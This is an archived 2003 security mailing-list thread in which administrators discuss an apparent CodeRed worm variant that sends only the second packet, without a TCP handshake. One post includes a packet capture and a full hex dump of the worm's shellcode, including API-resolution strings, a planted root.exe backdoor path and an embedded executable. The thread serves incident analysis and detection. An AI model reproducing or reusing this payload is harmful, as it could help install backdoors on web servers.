AHA! I reported this about a month ago and everyone thought I was crazy! I have all sorts of packet captures of this kind of activity. There are cmd.exe attempts, root.exe attempts, and the classic default.ida?X and default.ida?N attempts, but no TCP three way handshake. It is very strange. Theses attempts are destined to IP addresses that are not even up and running, never mind they are all fire walled off from the outside. We should compare notes. If you want to you can contact me off the list. vjl -----Original Message----- From: Frank Knobbe [mailto:fknobbeat_private] Sent: Monday, April 28, 2003 1:13 PM To: incidentsat_private Subject: Re: New CodeRed strain? -- UPDATE As I see it did make it to the list, here an update. The reason this packet hasn't been tripping the usual signatures is simple. We are receiving *only* the second packet. There is no first packet with GET /default.ida?XXXX etc. The packet itself appears to be classic CodeRed (II I believe), but again, we're getting only the second packet. No TCP 3-way, for first packet. While keeping our eyes on this, the majority appears to be coming from China, but we do some domestic (USA), Turkey, and I believe a Brazilian. I'm curious if anyone else is seeing these second-packet-only CodeReds. Regards, Frank On Fri, 2003-04-25 at 13:55, Frank Knobbe wrote: > Greetings, > > we've been picking up some oddities since yesterday which look like a > new CodeRed variant. Traditional signatures didn't identify it as such, > but looking at the payload, it appears to be a CodeRed'ish type of bug. > We're starting a trap for a complete session now. (So far have only > isolated packets). > > That isolated packet is below. I'll post the complete session once we > catch the whole thing. > > Has anyone else seen this? > > Regards, > Frank > > ---8<--- > > 04/25-17:44:56.268467 UTC 200.204.148.110:4699 -> x.x.x.x:80 > TCP TTL:105 TOS:0x0 ID:49613 IpLen:20 DgmLen:1500 DF > ***A**** Seq: 0xD7D856CE Ack: 0xF3E3078 Win: 0x4470 TcpLen: 20 > 00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43 ..u..U..E......C > 6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55 loseHandle..u..U > F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74 ..E......_lcreat > 00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F ..u..U..E......_ > 6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8 lwrite..u..U..E. > E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC ....._lclose..u. > FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79 .U..E......GetSy > 73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89 stemTime..u..U.. > 45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C E......WS2_32.DL > 4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63 L..U..E......soc > 6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 ket..u..U..E.... > 00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75 ..closesocket..u > BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74 ..U..E......ioct > 6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 lsocket..u..U..E > A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75 ......connect..u > BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65 ..U..E......sele > 63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00 ct..u..U..E..... > 00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8 .send..u..U..E.. > 05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89 ....recv..u..U.. > 45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61 E......gethostna > 6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00 me..u..U..E..... > 00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF .gethostbyname.. > 75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41 u..U..E......WSA > 47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC GetLastError..u. > FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33 .U..E......USER3 > 32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 2.DLL..U..E..... > 00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF .ExitWindowsEx.. > 75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84 u..U..E...E.i... > 08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1 ..@.E....xV4.... > C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 ........<.t.<.t. > C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 ................ > E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 ................ > E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF ......... ...... > FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF ................ > FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04 .............Y.. > 81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F .#...#.X........ > 74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 t....t.;.X...t.. > 68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D h......\...P.U.. > BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E ..\........\CMD. > 45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 EXE.^.....cj.... > 00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72 ..d:\inetpub\scr > 69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C ipts\root.exe... > 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 $....\...P.U.j.. > 2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C +...d:\progra~1\ > 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C common~1\system\ > 4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B MSADC\root.exe.. > 0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA .$....\...P.U... > 05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00 ....MZP......... > FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC ............@... > 00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C ...........PE..L > 01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0 ....*%)......... > 00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00 ................ > 00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00 ............ ... > 00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00 .@.............. > 00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00 ............@... > 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 ................ > 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 ............... > 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C ............0... > 01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................ > 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 ................ > 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00 ................ > 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 .......... ..`.. > 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04 ........... .... > 00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00 ................ > 00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10 ..@............. > 00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00 ...0............ > 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC ..........@..... > FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ > FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ > FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00 ................ > 00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68 ..........h....h > D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE . @..a...... @.. > 00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 . @.....j.h. @.. > 4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31 L........h.'...1 > 01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A .....h.$@.h?...j > 00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00 .h. @.h.....2... > 0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68 ..u&j.hT @.j.j.h > 48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF H @..5.$@....... > 35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68 5.$@..........h.$@.h > 3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80 ?...j.hX @.h.... > E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C .......uU.. @..L > 00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68 ..... @..B...j.h > B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 . @.j.j.h. @..5. > 24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A $@......j.h. @.j > 01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99 .j.h. @..5.$@... > 00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 ....5.$@........ > 05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0 ..$@.........h.$@.h. > 20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40 @.h.$@.j.U.5.$@ > 00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B ..`.....uI..$@.. > C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81 .t@.. @..>.t6Ff. > 7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20 ~.,,u...217.... > 40 00 89 35 @..5 ---------------------------------------------------------------------------- Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the world's premier event for IT and network security experts. The two-day Training features 6 hand-on courses on May 12-13 taught by professionals. The two-day Briefings on May 14-15 features 24 top speakers with no vendor sales pitches. Deadline for the best rates is April 25. Register today to ensure your place. http://www.securityfocus.com/BlackHat-incidents ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Wed Apr 30 2003 - 10:12:24 PDT